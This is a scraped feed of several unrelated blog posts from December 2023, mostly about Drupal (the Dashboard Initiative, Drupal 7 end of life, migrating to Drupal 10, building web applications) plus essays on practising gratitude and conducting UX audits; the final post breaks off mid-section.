In software terms, End of Life means that the version of that software no longer receives feature updates, bug fixes, or security releases. This last point is the most important. If a security vulnerability is discovered after the end of life date, it may be publicly disclosed, and you will be unable to update your site to protect against the issue. For this reason, we recommend beginning to plan your migration now. 

Whether you want to take advantage of new functionalities with Drupal 10 or opt for another option, we’re here to support you. 

Visit our resource center to migrate from Drupal 7 now, and stay tuned for more blogs in our Drupal 7 End of Life series!

Dec 06 2023
Dec 06

Authored by: Nadiia Nykolaichuk

When logging in to a Drupal website, we all have different goals based on our specific responsibilities. Could each of us have a seamless journey through the admin UI, with no need for any extra steps, and with all the most relevant shortcuts at our fingertips? 

Adding a touch of personalization might be very helpful here, and that’s what the new Dashboard Initiative in Drupal is aimed at. Discover more details about the Initiative, as well as some other hot-from-the-oven features for Drupal’s administrative pages. All of those innovations clearly show that Drupal is gaining impressive momentum towards raising the usability of its admin interface sky-high.

Demystifying the Dashboard Initiative in Drupal

The key essence and the creation of the Initiative

The Dashboard Initiative is meant to provide different admin dashboards for different Drupal users based on the tasks they need to do. Dashboards will be the place for users to land on as soon as they log in to a Drupal website. There will be out-of-the-box dashboards in Drupal’s Standard profile, as well as unlimited customization options with the possibility to shape dashboards by adding blocks to them. 

The innovation was highlighted in an insightful session “So I logged in, now what? The Dashboard initiative welcomes you” by Drupal core contributors, Cristina Chumillas (ckrina) and Christian López Espínola (Penyaskito), both at Drupal Developer Days 2023 and DrupalCon Lille 2023. Our team was happy to attend the latter event where we noticed that the session was gaining traction, with the room fully crowded! 

The Initiative started at DrupalCon Prague last September when Christina, who is also the Drupal core UX maintainer, shared her idea with Christian. Today, the Initiative’s team involves over a dozen great people, and more contributions are welcome. As is always the case with young Drupal initiatives, lots of things are subject to change and lots of issues to work on, but it’s so promising and brilliant that it’s worth spreading more word about.

What problems the Initiative aims to solve

The speakers outlined the following key problems:

  1. When a user logs in, they are redirected to the “/user” page telling them for how long they’ve been on the website, which is certainly not the most useful information.
  2. Thinking of a better option for a start page, it’s clear that, for example, the “/content” page would be great for content editors but useless for site builders. The point is that every user should start their journey at a completely different point based on the tasks they want to accomplish. 
  3. Even users working with content need to perform different actions with it. For example, they might want to see only the draft content. This requires extra steps in the admin UI, which could be eliminated thanks to personalized dashboards.
  4. Finally, there is no place in the Drupal admin interface to show site-wide communications with some important notifications, and that is the fourth problem the Dashboard Initiative should be able to solve.
A set of slides on the problems that the Dashboard Initiative is meant to solveA set of slides on the problems that the Dashboard Initiative is meant to solve.

The user personas

The Dashboard Initiative’s team started their work by defining the key user personas and what each of them wants to see. Just for a detailed explanation of what user personas are, you could check out our article based on the example of a university website’s students. 

So here are the 4 main personas the Dashboard Initiative relies on:

  1. Administrator
  2. Site Builder
  3. Content Editor
  4. Content Manager
A slide with the user personas for the Dashboard InitiativeA slide with the user personas for the Dashboard Initiative.

The Initiative’s team also needed to figure out the tasks for the user personas that would solve 80% of cases (not 100%, because each Drupal site was a completely different story, says Christina Chumillas). They started by defining the behaviors, motivations, and frustrations of each user persona.

A slide with the behaviors, motivations, and frustrations defined for the “Site builder” user personaA slide with the behaviors, motivations, and frustrations defined for the “Site builder” user persona.

The MVP for the dashboards

The speakers presented an MVP for the Initiative with the basic tasks that the out-of-the-box dashboards should include. There is an MVP for two dashboards: 

  1. “Site administrator” (which unites the Administrator and the Site Builder personas)
  2. “Content user” (which unites the Content Editor and the Content Manager personas)

The default tasks in each dashboard depend on the modules installed on the website. For example, if the core multilingual functionality is enabled, the Content user’s dashboard will include a block with missing translations. Or, if the core Announcements Feed module is on — a new experimental module we mentioned in the article about what’s new on the way from Drupal 10 to Drupal 11 — the dashboards will include announcements.

A slide with the MVP for the “Site administrator” and “Content user” dashboardsA slide with the MVP for the “Site administrator” and “Content user” dashboards.

What’s under the hood?

According to Christian López Espínola, a dashboard will be just a configuration entity that stores references to blocks. It will be possible to enable or disable it as any other configuration entity. When this entity is not enabled, the administration experiences will start with the “/user” page as usual. In the future, when Dashboards become stable in the Drupal core, they should be enabled from the start.

Christian also explained that the dashboards are based on the front-end concept of progressive enhancement: “The idea is that we will have a dashboard that doesn’t depend on anything, but if you, for example, install the Layout Builder, then you’ll be able to customize the dashboard with the Layout Builder.”

If a website is not using Layout Builder, Drupal’s default page-building tool, it should be possible to create the dashboard blocks with other tools as well. That’s because the Initiative leads changed their initial plan to fully depend on the Layout Builder but decided to try to make the dashboards agnostic of the specific building tools. 

A slide explaining that a dashboard is a config entity with blocks that can be built with not only with Layout Builder but with other page building tools.A slide explaining that a dashboard is a config entity with blocks that can be built with not only with Layout Builder but with other page building tools.

A demo of dashboards

The speakers also shared the demos of the dashboards from the point of view of the admin user that logs in to a Drupal website. This user sees two dashboards: the Default dashboard, which is the “Administration” dashboard, and the “Content Management” dashboard. They both have the “Edit layout” button at the top and sets of specific blocks.

Here are some of the blocks currently included in the “Administration” dashboard:

  • Recent comments 
  • Recent content
  • Cron status
  • Clear cache
A demo of the “Administration” dashboard.A demo of the “Administration” dashboard.

 Here are some of the blocks currently included in the “Content Management” dashboard:

  • My own drafts
  • Recent content
  • Recent comments
A demo of the “Content management” dashboardA demo of the “Content management” dashboard.

Permission-based dashboards

Initially, the team was planning to have role-based dashboards. However, according to Christian, users often wear multiple hats, which means that the same person can be a site builder, an admin, and a content editor on their website. So they decided to allow multiple dashboards to be available to the same user roles based on the customizable permissions. 

A slide showing that dashboards will be based on permissions.A slide showing that dashboards will be based on permissions.

So the People > Permissions page on a Drupal website will have permissions for the standard Drupal roles to do the following:

  • access specific dashboards
  • administer dashboards, which includes creating, editing, or deleting them (the Dashboard Initiative creators are planning to make the permissions more granular with time)
A slide showing the dashboard permissions.A slide showing the dashboard permissions.

The dashboard configuration page

There will be a special page in the Structure section of a Drupal website for dashboard configuration. It will list all the dashboards and enable you to reorder them by changing row weight or by drag-and-dropping, as well as edit them. If the Layout Builder is enabled, there are links to edit the dashboard layouts with its help.

A slide showing the dashboard configuration page.A slide showing the dashboard configuration page.

Not brand-new: previous attempts to create a dashboard in Drupal

There already was an attempt in Drupal 7 to provide the Dashboard page in the administrative interface. It was the same for site builders, content editors, and other users. The page showed the “Who’s new” and  “Who’s online” blocks, offered a couple of administrative shortcuts to add or find content, and provided a search box for searching the website. 

A slide with Drupal 7’s attempt at having a dashboard.A slide with Drupal 7’s attempt at having a dashboard.

According to Christina, the Dashboard in Drupal 7 was actually a very good idea, but for whatever reason, the page didn’t end up the way it was planned, and many people even created ways to disable the page by default. So when creating the new dashboards, the team did such serious preparation work figuring out what users might want to see there. 

Other improvements to Drupal’s administrative interface

The Dashboard Initiative is not an isolated thing, explained Christina at the session. Instead, it’s part of the roadmap to improve the overall usability of the Drupal administration interface

A slide with other improvements to Drupal’s admin UI besides the dashboards.A slide with other improvements to Drupal’s admin UI besides the dashboards.

Some other improvements are as follows:

  • Navigation modernization

It will become easier to navigate through Drupal’s UI thanks to layout redesign with the theme’s regions reorganized, the administrative toolbar revamped in accordance with the best UX patterns, and more. 

One of the most interesting innovations-in-progress for Drupal’s admin navigation is a new left-side content editor menu. It will accumulate all tasks that might be relevant for content creation/management, so those tasks will no longer be scattered across multiple admin sections.

A prototype of the new content management menu in Drupal.A prototype of the new content management menu in Drupal.
  • Better field creation experiences

The workflows for creating fields and re-using existing ones are getting much more seamless for site builders. The interface for adding fields is being significantly revamped. It’s now possible to use new user-friendly buttons, view information about where the fields are used, and it is also planned to group the fields into categories for an easier selection process.

Field grouping for better field creation experiences.Field grouping for better field creation experiences.
  • Layout Builder improvements

The Layout Builder is also preparing for multiple improvements in the near future. The team is working on making the list of available blocks less overwhelming, the formatter settings or other configuration options more understandable for content editors, and the UI for selecting and editing blocks easier to use.

Reduced number of blocks in Layout Builder for better user experience.Reduced number of blocks in Layout Builder for better user experience.

Final thoughts

It looks like the vision of the old Drupal that used to be focused on developer experiences is vanishing into the past forever. Historically, a user-friendly interface wasn’t among Drupal’s strengths, but during recent years the CMS has been going through a complete metamorphosis, and the process is speeding up. All website owners need to do is catch up with all the fast innovation through regular website updates. Let customized dashboards and other administrative UI improvements genuinely elevate the experiences of all Drupal users!

Dec 06 2023
Dec 06
Laura JohnsonLaura Johnson

Laura Johnson

Senior Engineer

Primarily a backend developer, Laura also loves adding new cross-disciplinary skills to her collection, such as working with themes and frontend frameworks.

December 6, 2023

If your organization is still using Drupal 7 or later, migrating to an up-to-date platform for your website has been looming like a weight on your shoulders. The move to Drupal 10 isn’t easy. It requires a migration of your site and a full redesign to take advantage of the new tools the latest version offers.

Not only do you need someone to write that migration, but you also need to secure the budget to undertake a project like this. As you wait for the right time to get started, the weight of the deadline to begin your migration to Drupal 10 has only grown heavier. After multiple extensions, the Drupal community has set January 5, 2025 as the final end-of-life date for Drupal 7.

What does that mean for your organization? On the one hand, you now have just over a year to start planning a migration before your site loses crucial support. But on the other hand, as many organizations like yours face a similar deadline, you can’t afford to wait much longer. The time to make the move to Drupal 10 is now.

Why you need to start planning for a Drupal 10 migration

If you’ve fallen behind in migrating your site from Drupal 7, you’re not alone. According to the Drupal community, more than 350,000 projects still use that version of the platform as of November 2023 — one-quarter of all Drupal sites.

As a result, you aren’t just facing a hard deadline to relaunch your new site as January 2025 grows closer. You’re also competing with a vast number of organizations just like yours who need to coordinate the same migration with a web development agency partner. Given that it takes an average of six months to complete the sales process to get started on a Drupal 7 migration, you’re already at risk of missing the deadline if you have not yet contacted an agency.

The longer you wait, the less likely you are to find a team with availability to work with you on a migration plan and website redesign before Drupal 7 reaches end-of-life. And, given the stakes involved, your organization can’t afford the risks of sticking on a platform without the vital benefits of ongoing support.

What your organization loses when Drupal 7 reaches end-of-life

Drupal 7 will reach its end of life 14 years after its initial release. If you’re still on the platform, your website will remain accessible after January 5, 2025. However, it will no longer receive feature updates, bug fixes, or security releases from the Drupal community.

This last detail is most critical to your organization. Any security issues discovered after January 2025 may be publicly disclosed, but Drupal will no longer provide any necessary updates. Prior to the announcement of this final extension for Drupal 7, your organization had the option of paying for extended support. But that is no longer the case.

When you work with the right agency partner, you can create a migration plan that will keep your website secure. Fortunately, your organization will be able to better manage ‌site security after the migration is complete. But that’s just one of the advantages made possible by getting your organization started with Drupal 10.

Drupal 10 offers dramatic advantages after migration

Trusting your site with the legacy code of Drupal 7 doesn’t just expose your organization to poor security. It prevents you from taking advantage of dramatic improvements for your site’s users and content editors.

Improved website speed and SEO performance

Fundamentally, your Drupal 10 website will run faster. Dynamic caching reduces page load times by invalidating only the content that has changed. Instead of needing to reload your entire page after a set amount of time, your cache can just reload the block with new information.

Drupal 10 also marks the end of Drupal 7’s jQuery. A large JavaScript library, jQuery was a powerful tool, but modern browsers perform many of the same functions. The up-to-date JavaScript used by Drupal 10 also decreases page load times.

Drupal 10 also supports new formats such as schema.org, Open Graph, and JSON-LD, which increase conversions from search engines. Plus, Drupal 10 supports advanced accessibility features that improve WCAG compliance and further improve SEO rankings.

Better site security and reduced maintenance costs

Drupal 10 improves your site security by including up-to-date protocols and dependencies such as PHP 8, Symfony 6, and CKEditor 5. As earlier versions of these dependencies reach end-of-life, they may be exposed to unpatched security vulnerabilities. Migrating to Drupal 10 avoids delays in getting critical security patches applied to your site.

One of Drupal’s major advantages as an open-source platform is the community’s Security Team, which delivers security advisories and provides guidance to contributed module maintainers on how to resolve potential vulnerabilities. Providing continued support from the community Security Team for all of your site’s contributed modules beyond the upgrade deadline is critical.

Improved content editing experience and efficiency

Drupal’s out-of-the-box CMS experience has always been limited. With Drupal 10, your site editors benefit from the Claro theme, which makes Drupal much easier to use. New image tools and an updated media library also enable better organization of your site’s assets.

Drupal 10 also includes the JavaScript text editor CKEditor 5, which further simplifies content creation and its accessibility. In addition, the platform offers enhanced translation capabilities in multiple languages, which enables your organization to reach a wider audience than ever.

Don’t wait until an emergency before moving to Drupal 10

Making the web a better place to teach, learn, and advocate starts here...

When you subscribe to our newsletter!

Dec 06 2023
Dec 06

Introduction

This article explores the benefits of practicing gratitude and how to do it.

Yeah, I get it. Feeling grateful is far from easy. Life isn’t always fair. 

So many things go wrong everyday. 

But then, so many things get right, too.

It’s up to us how we perceive life—which parts of it we focus on, let into our minds.

It’s up to us to feel grateful for all we’ve got, or sorry for what we haven’t.

What’s Gratitude?

Gratitude is the feeling of being grateful—of the blessings and bounty one receives.

Many associate being grateful with grand acts and materials.

Reserving feeling thankful for those rare occasions when an act of kindness smacks them in the face with its sheer positive force. 

Like when a birthday present turns out to be the new iPhone.

And even then, people hesitate to express how grateful they feel. 

But here’s the truth.

One can be grateful for anything if they learn to see how it adds value to their lives. 

Value that may be material, but certainly not limited to it.

Does Practicing Gratitude Mean Giving Up On A Better Life?

There’s an existing notion that connects gratitude with a lack of drive.

For better, finer things in life. For a better life itself.

Being grateful doesn’t diminish one’s drive for a better life. It opens one’s eyes to life’s existing blessings—that make it fruitful, enjoyable, livable, here and now.

The gratitude attitude merely shifts the focus.

From constantly wanting more to appreciating what we already have.

Axelerant team members bonding over meetings

You can still aim for higher goals—while enjoying the present and celebrating past milestones.

Celebrating the resources, the people, the support that got you this far. 

You work towards the changeable, accept that some things can’t be changed, and count your blessings as they come.

New call-to-action

What Have I Got To Be Grateful For?

It’s a question many struggle with. 

If you’re one of them, fret not. I’ve got just the thing for you.

An extensive questionnaire to ponder over by Dr. Joel Wong.

Cut yourself some slack if you can’t find reasons to be grateful right away.

Daily reflecting on events, people we cross paths with, things around us, is not taught as part of growing up.

So, we’re clueless about how our surroundings affect us—until the emotions are too strong, too on the face.

Anjali sleepy and getting a headache

Gratefulness hides in the sunny morning, a quiet thank you from a colleague, a deep conversation with a friend.

It hides in the smell of fresh coffee or a tight morning hug. Inside the coziness of a blanket in winter or the silly joke from kids.

You may think that these are too simple to feel grateful about. That they don’t count.

But here’s the thing: they do.

Axelerant team member Kanika making tea between breaks

What Are The Benefits Of Practicing Gratitude?

Practicing gratitude brings so many benefits to the body and mind. 

Not to mention relationships with people.

Even if you don’t realize that being grateful is making you healthier—it still does.

Benefits Of Gratitude On Your Mind And Emotions

Every situation has some advantages and disadvantages, every person some good habits and bad.

When we consciously practice being thankful to the good that comes to us from others, happiness and contentment follows. 

Research shows practicing gratitude can lessen anxiety, stress, and help combat depression.

In fact, positive psychology researchers Martin Seligman and colleagues discovered that a single act of thoughtful gratitude produces an immediate 10% increase in happiness, and a 35% reduction in depressive symptoms.

Benefits Of Gratitude On Your Body

The link between actual physical benefits with thankfulness may be a little less conspicuous.

Practicing gratitude can:

Plus, if you count the reduction in stress, anxiety, and depression? It prevents lots of future diseases, too. 

Benefits Of Gratitude On Relationships

It’s common sense that practicing thankfulness in a relationship takes it on a whole new level.

Whether it’s a romantic or professional relation, expressing gratitude strengthens the bond.

Studies show that even the innocent bystander, witness to an expression of gratitude between two people, will feel warmth and affinity towards them.

At work, a regular practice of expressing gratitude can build more robust teams and influence people’s decisions to remain in the organization.

Sucheta recognizing Axelerant and her team members for being there for her

According to a Great Place to Work Institute survey, recognitions—not pay or perks—was the most powerful reason for people to produce great work.

How To Practice Gratitude?

Gratitude is a way of life. A powerfully positive one.

And to embrace it, you need practice.

Intellectual knowledge is only the first step towards real change.

Gratitude practice has four parts to it:

  • Notice
  • Think
  • Feel 
  • Do

In real life, some of these happen simultaneously and at a subconscious level when we feel thankful. 

But we want to be conscious about it while practicing.

Let’s take a small example to understand these stages.

Suppose you’ve been advised by your doctor to drink more water throughout the day.

But you keep forgetting about it at work. 

And a colleague takes it upon them to remind you whenever they can.

Notice

Don’t just gulp down water looking at the screen. 

Take a moment, and notice.

  • What was your friend doing when they reminded you to drink water?
  • Did they set aside their work to make sure you stay hydrated? 
  • Did they walk to your desk? Drop a message in your inbox? 

Notice their effort. 

You may find that reminders are not the only thing your colleague does for you.

Gradually, you’ll be able to notice all the other positive gestures that come your way from the people around you— and not just at work.

Think

Reflect on the impact of these reminders on your life.

James Clear, in his book Atomic Habits, mentions how small steps—unforgotten sips of water throughout the day, in this case—can create momentous differences.

These reminders help improve your health, work experience, productivity, and overall well-being.

(I’ve seen people faint and hospitalized from dehydration, because they couldn’t remember to drink enough water!) 

Feel

Once you notice and realize the impact of your colleague’s reminders, look within.

Allow yourself to feel the positive emotions that emerge.

Embrace that sense of thankfulness towards your colleague’s care for you. Towards the person.

Acknowledge their kindness and love expressed through these small gestures.

Do

It’s time to spread that goodness. Reciprocate.

Here’s where things get even more interesting—for you.

Research shows when you reflect and express gratitude, your brain releases dopamine and serotonin.

These chemicals make you feel good, happy, positive, and increase motivation and willpower.

Can you imagine? 

A simple, heartfelt thank-you note making your brain glow up with all the right chemicals?

Start Your Gratitude Practice Today

Experts believe practicing gratitude even once in a day is enough to reap its benefits.

The aim to be genuine, honest, and specific about the subject of gratitude.

Here are a few things you can incorporate into your life:

  • Morning reflections: Start with a determination to be grateful for all the positive things that you receive. Tony Robbins calls this priming.
  • Gratitude journal: Dedicate a few minutes daily to jot down things you appreciate or moments that brought joy. This helps reinforce positive thoughts. It could be about a glimpse of a colorful bird at lunch break. Or a birthday gift you gave to yourself.
  • Express thankfulness: Verbally express your gratitude to someone who's helped you or made you feel good. It could be a colleague, family member, or a friend. You may send a written note, too.
  • Mindful appreciation: In the midst of life, as it unfolds every moment, be mindful about the little things that make your life enjoyable, beautiful. A good film, a conversation with a friend, a cup of tea, access to fresh water and air, machines to control temperature, blooming of a flower, etc. There are so many things that add value to our lives every day.
  • Evening recap: Note down three to five things you felt thankful for that day. This practice showed me that each day could be taken as a bad or a good day—depending on what you focus on at the end. Like childhood memories. 

Let’s spread the magic of gratitude one thanks at a time.

New call-to-action
Dec 06 2023
Dec 06

Introduction

In 2016, Instagram went through a design overhaul with a surprising result.

Fueled by new features and seamless mobile user experience, the social media platform doubled its user base in two years. User engagement and adoption further increased with the launch of “Stories,” the copy of a similar feature from Snapchat.

Such design overhauls should ideally be done after conducting a user experience audit. 

Daily active Instagram users stats

What Is A UX Audit?

A user experience (UX) audit is a thorough, data-driven evaluation of an app's or a website's user experience. It enables organizations to assess design choices and discover areas of improvement. This ensures alignment of the design with user needs and expectations.

We must design for the way people behave, not for how we would wish them to behave.

  Donald A. Norman, Co-Founder, Nielsen Norman Group

Why Do Organizations Need A UX Audit

Conducting a UX audit helps organizations in:

Identifying Usability Issues

A UX audit helps identify gaps in usability, which also translates to better performance, customer engagement, and conversion rates. 

For example, Amazon’s early stage website interface demonstrates everything that can go wrong with a website’s usability. This includes poor navigation, lack of familiarity, and visual clutter. 

The latest version of the Amazon website is an eCommerce success story, offering a much more intuitive interface. It provides easy navigation and personalized recommendations via advanced algorithms. Seamless mobile optimization and a simplified checkout process enhance user experience, making the interface user-friendly for shoppers.

Amazon's early stage website interface

Enhancing User Satisfaction

A UX audit helps organizations identify design improvement scope by implementing major aspects of user delight. These include helpful error messages, legible text, and useful filters. Such elements make the experience seamless for the users and make them delighted. This enhances user engagement and boosts customer loyalty.  

User delighters in 2023

Reducing User Frustration

According to Delottie’s Milliseconds Make Millions report, websites taking longer than 10 seconds lead to frustrated users. A UX audit helps identify similar areas of frustration across the user journey for better design decisions. 

Customer reaction to slow loading e-commerce website

Streamlining Navigation

The Yale School Of Art website is a classic example of bad navigation. The complex menus, visual clutter, and unclear pathways make navigating the site difficult for visitors.

A UX audit helps outline navigation issues. This streamlines the user journey, resulting in efficient content discovery and better conversions.  

Yale school of Art - navigation

Identifying Accessibility Concerns

Accessibility is one of the integral parts of a great user experience. Without identifying and fixing accessibility issues early on, businesses may suffer losses. It may also lead to lawsuits. A UX audit helps organizations identify accessibility issues to comply with the regulations and reach a broader audience. 

ADA Title III Web Accessibility Lawsuits in Federal Court

Enhancing Competitive Advantage

Statistics from PwC state that 59% of US customers will abandon a brand they love after several bad experiences. A UX audit helps organizations set the stage for better user experience and gain a competitive advantage.  

For instance, the streaming app Netflix's dedication to a user-friendly interface and tailored content suggestions enhance the immersive streaming experience. This commitment to satisfying users and personalizing content has firmly established Netflix as a frontrunner in the fiercely competitive streaming industry.

Netflix user experience algorithm

How To Conduct A Basic UX Audit

Conducting a basic UX audit consists of the following steps.

Step 1: Understand The Business Goals 

Before conducting a UX audit, comprehend the business objectives associated with the product. Align the evaluation with the organization's goals, like increasing sales, brand visibility, or user engagement. This will guide the audit process, helping bring the focus on areas that directly impact these goals.

Step 2: Understand User Behavior

A deep dive into the user's perspective is the second step of a UX audit. Understanding how users interact with the product and what they aim to accomplish provides context for the evaluation and helps identify the scope for improvement.

Using various analytical tools for user behavior is a popular option.  

Tools such as Hotjar and Crazy Egg produce heatmaps that visually depict user clicks, movements, and time spent on a page. This visual information assists in identifying patterns, optimizing page layouts, and pinpointing elements that capture or divert user attention. 

Session recording tools such as Mouseflow and SessionCam permit UX experts to observe live user sessions, reveal user challenges, highlight navigation issues, and showcase user interactions with specific features.

Step 3: Perform Heuristic Usability Evaluation

Heuristic Usability Evaluation involves assessing the product against established design principles, like Nielsen's 10 heuristic design principles. This step puts businesses in the user's shoes and evaluates the product from their perspective.

The following table provides steps to conduct a heuristic evaluation.

Select Heuristic Principles

Identify and choose established usability heuristics (e.g., Nielsen's 10 Usability Heuristics) to serve as evaluation criteria.

Define Evaluation Criteria

Clearly articulate specific criteria for each selected heuristic to guide the evaluation process.

Choose Evaluators

Assemble a team of usability experts capable of impartially assessing the interface.

Provide Training

Conduct a briefing or training session to ensure evaluators understand the selected heuristics and their application.

Individual Evaluation

Each evaluator independently reviews the interface against chosen heuristics, noting violations or areas for improvement.

Record Findings

Document instances where the interface deviates from heuristics, using screenshots, annotations, or notes. Detailed notes and screenshots are taken to document challenges and pain points encountered during this evaluation.

Severity Rating

Assign severity ratings to identified issues based on their impact on user experience to prioritize improvements.

Consolidate Results

Collect and consolidate findings to create a comprehensive report detailing usability issues and their severity.

Debriefing Session

Convene a debriefing session with evaluators to discuss findings, share insights, and address discrepancies.

Prioritize Recommendations

Prioritize recommendations based on issue severity and potential impact on user experience. The heuristic evaluation process is iterative, with multiple rounds of assessment and improvement cycles to refine the interface.

Generate Actionable Insights

Transform evaluation findings into actionable insights, providing clear recommendations for interface improvement.

Step 4: Compile Findings And Make The Report

After the audit, findings from the heuristic evaluation and any data analysis are compiled into a comprehensive report. This report outlines the identified issues, categorizes them based on severity, and provides actionable recommendations for improvement. Accessibility concerns are also highlighted, along with suggestions for addressing these concerns.

Challenges In Conducting A UX Audit 

Before diving into a UX audit, it is important to note three of the most common challenges faced by organizations.

Defining Scope

The main challenge in a UX audit is setting clear project boundaries. A UX audit examines various aspects like functionality, usability, and aesthetics. But trying to uncover everything can be overwhelming. This can result in many findings that may not be practical. 

To prevent this, clearly defining the audit's purpose, goals, and deliverables is crucial. Involve stakeholders, set realistic expectations and deadlines, and prioritize addressing crucial issues and opportunities. For instance, on an ecommerce website, instead of evaluating all website features, focus on improving one critical feature, such as the checkout process.

Resistance To Change

A UX audit might propose changes demanding substantial resources, time, or effort. Some stakeholders or users might resist adopting these changes, driven by the fear of failure, lack of trust, misunderstandings, and technical hurdles.

Organizations can mitigate this challenge by engaging different departments in the UX audit process to bring diverse perspectives and expertise to the evaluation. It's also recommended to conduct workshops, courses, and training sessions on fundamental UX principles and best practices for the teams.

Gated Properties And Restricted Access

Restricted access in gated properties, marked by credential limitations, can disrupt digital workflows. It prevents teams from accessing specific areas of a website or app during a UX audit. 

For example, a delay in accessing critical content leads to delays, miscommunications, and frustration. The solution is to take UX audits as an iterative process, as this equips teams with more time to deal with gated properties and restricted access.

How Axelerant Helped Implement Red Hat’s UX Audit  

Red Hat wanted to offer a fresh learning journey for developers, driven by seamless user experience. They approached Axelerant with two key challenges:

  • Restructuring the information architecture on the website for seamless user journeys  
  • Creating a roadmap for the portal’s business objectives through design

Backed by the Design Thinking and How Might We frameworks, the approach ensured that the portal would be able to solve user problems. It included a usability audit, information architecture and navigation redesign, and website redesign. 

This led to a more engaging developer portal with enhanced user experience.

A UX audit paves the way to frictionless user experience regardless of your organization’s scale. Not sure where to start? Talk to our experts and learn more.

Dec 06 2023
Dec 06

Meeting customer demands for personalized user experiences is paramount for businesses. To achieve this, adopting a mobile-first approach and ensuring swift responses becomes mission-critical. 

With users increasingly seeking engaging and interactive elements in their web experiences, organizations must choose a content management system (CMS) that aligns seamlessly with their requirements.  

Drupal is a preferred CMS for web application development, known for its open-source nature and high-security standards.

The Significance of Drupal in Web Application Development:

Drupal, an open-source and highly secure CMS, is pivotal in crafting robust web applications. Renowned brands like Johnson & Johnson, General Electric, and eBay trust Drupal development to deliver exceptional digital experiences. But why is Drupal the go-to choice for industry leaders in web application development? Let's delve into the reasons:

Unveiling the Power of Drupal: Why should you consider using Drupal to build a web application?

Drupal to build a web application

When organizations embark on web application development, they seek a content management platform that is secure, reliable, and flexible. As an open-source CMS platform, Drupal is the trusted choice for small-to-large organizations globally, including Nasdaq, Cisco, and Tesla. Its reputation for innovation and scalability is supported by community-driven code and a robust architecture tailored to meet enterprise requirements. 

Here's a closer look at why Drupal is an ideal choice for web application development in 2024:

Flexibility at its Core

Drupal provides a robust framework for creating precise web applications. With its core components and APIs, Drupal seamlessly accommodates complex web applications. The key lies in utilizing suitable modules to attain specific functionalities. Here are some crucial modules that help build a web application:

Module Name

Functionality 

CONFIG SPLIT 

This module plays a crucial role in defining the configuration sets to separate directories at the time of export and merge them at the time of import.

DIFF

Every time a new draft is created, this module offers a tab that reflects all the revisions and makes it easy to view all the words that have been added, modified, and deleted.

PATHAUTO 

This module enables you to define specific patterns for content the moment it gets created. For example, in the case of a blog content type, this module automatically lets you add /blog in the URL.

ADMIN TOOLBAR

By elevating the administrative user experience, this module offers a drop-down menu that makes it easy to access the different administration pages.

REDIRECT 

This module streamlines the redirect handling process in Drupal by automatically building a redirect for every content piece with an updated path.

Be it event registrations, insightful analytics, or interactive videos, Drupal has got you covered! You can also combine different modules according to your needs. Just like LEGO, Drupal empowers you with a myriad of blocks that allow you to build whatever you want.

Why is Drupal Flexible?

Drupal's flexibility extends beyond its core functionalities, with over 48,000 community-contributed modules. These modules offer plug-and-play functionality and help tailor web applications based on the specifications provided. From gaining insights through Google Analytics to ensuring GDPR compliance for cookies, Drupal has a dedicated module for every need.

Customer-centric user experience

Drupal simplifies the delivery of customer-focused experiences. 

It empowers organizations to create web applications that meet visitor needs, aiding informed decision-making. The user interface is meticulously crafted with the customer in mind, ensuring personalized and customer-centric interactions. The goal is to deliver a unique experience that fulfills users' specific needs throughout their journey.

Drupal web application development offers unparalleled flexibility, security, and a customer-centric approach, making it the ideal choice for organizations aiming to elevate their digital experiences.

Customer-centric user experience

A Success Story: Accelerating Web Development with Drupal

Empowering a Fortune 200 Life Sciences Company

A Fortune 200 Life Sciences Company engaged in groundbreaking R&D activities faced the challenge of creating a powerful multisite platform with an impeccable user interface. 

With over 400 companies under its umbrella, geographical diversity posed a unique challenge, necessitating a seamless web solution. After encountering challenges with a previous vendor regarding the technical intricacies of Drupal and Site Factory, the life sciences company turned to Axelerant for a solution. 

Their objectives included reducing launch times, achieving cost savings, and enhancing collaboration. Read how Axelerant leveraged the power of the Site Factory and Site Studio to develop a robust tool for delivering consistent brand experiences as well as personalized user journeys to their visitors.

How does Drupal deliver a customer-centric user experience?


Drupal is enriched with various built-in modules that make it an ideal CMS for the following factors:

Personalization Modules – Drupal boasts built-in modules, including Personalization Module, Commerce Recommender, and Browsing History Recommender, enabling tailored user experiences. 

Despite a preference for JavaScript-based solutions, Drupal's open-source options shine. Read how Axelerant seamlessly integrated Site Studio and the Context module to drive personalization in Drupal applications, offering a comprehensive solution.

Caching Optimization –  Drupal's Internal Page Caching and Internal Dynamic Page Cache modules elevate speed and page load efficiency. Anonymous visitors experience faster loading times as pages are cached intelligently, ensuring a smoother user experience.

Built-in block system – Drupal's block system allows effortless rearrangement of a web application's layout by dragging and dropping required blocks. This helps ensure design uniformity and content reuse across multiple pages.

WYSIWYG editor – The WYSIWYG editor in Drupal empowers users to preview text and images before publishing, enhancing the content creation process.

Responsive design – Drupal's responsive design ensures a seamless experience across devices, whether accessed through smartphones, desktops, or tablets.

Social media modules – Drupal simplifies social media connectivity with various integration modules, facilitating easy linking to platforms like Twitter and Facebook directly from the web application.

API-Friendly Architecture

Drupal's API-first initiative facilitates content creation and management, catering to various front-end applications. Its API-friendly architecture, including RESTful Web Services API, JSON: API, Render API, and Translation API, ensures a streamlined and enriched customer journey. 

What makes Drupal API-friendly?

Every modern CMS should ideally have access to robust APIs and integrate them across every stage of the customer journey for a better experience. The latest releases of Drupal have announced various APIs like:


RESTful Web Services API - It is known for supporting a decoupled Drupal website. It is responsible for the communication between native mobile applications and a specific Drupal website. Also, it takes care of web services integration.

JSON:API - This module has simplified integrations by allowing serialization and communication through JSON. 

Render API - It includes improved caching protocols and ensures faster page rendering to elevate the overall user experience. 

Translation API - This Drupal API plays a vital role in adjusting the language on the web application according to prospect/visitor geographies.

SEO Optimization

Since Drupal 7, the platform has excelled in SEO optimization. Leveraging semantic structure and RDF support, Drupal optimizes content for search engines, utilizing alt and title tags effectively. A Forrester report acknowledges Drupal's semantic approach as crucial for content managers and authors, further solidifying its position as a leading CMS for SEO.

An Interesting Story: Transforming Legacy.com's Editorial Section with Drupal

Empowering the editorial segment of Legacy.com's global online obituaries platform has been a remarkable journey. With partnerships spanning 1,500+ newspapers and 3,500 funeral homes, Legacy.com serves 40 million unique visitors monthly. Facing the challenge of launching Drupal CMS within six months, Read how Axelerant collaborated with Facet Interactive to deliver an enterprise-level headless Drupal platform, optimizing media organization, content publishing speed, and comprehensive support for newspapers.

Drupal's Search Engine Friendliness Unveiled:

SEO Modules:

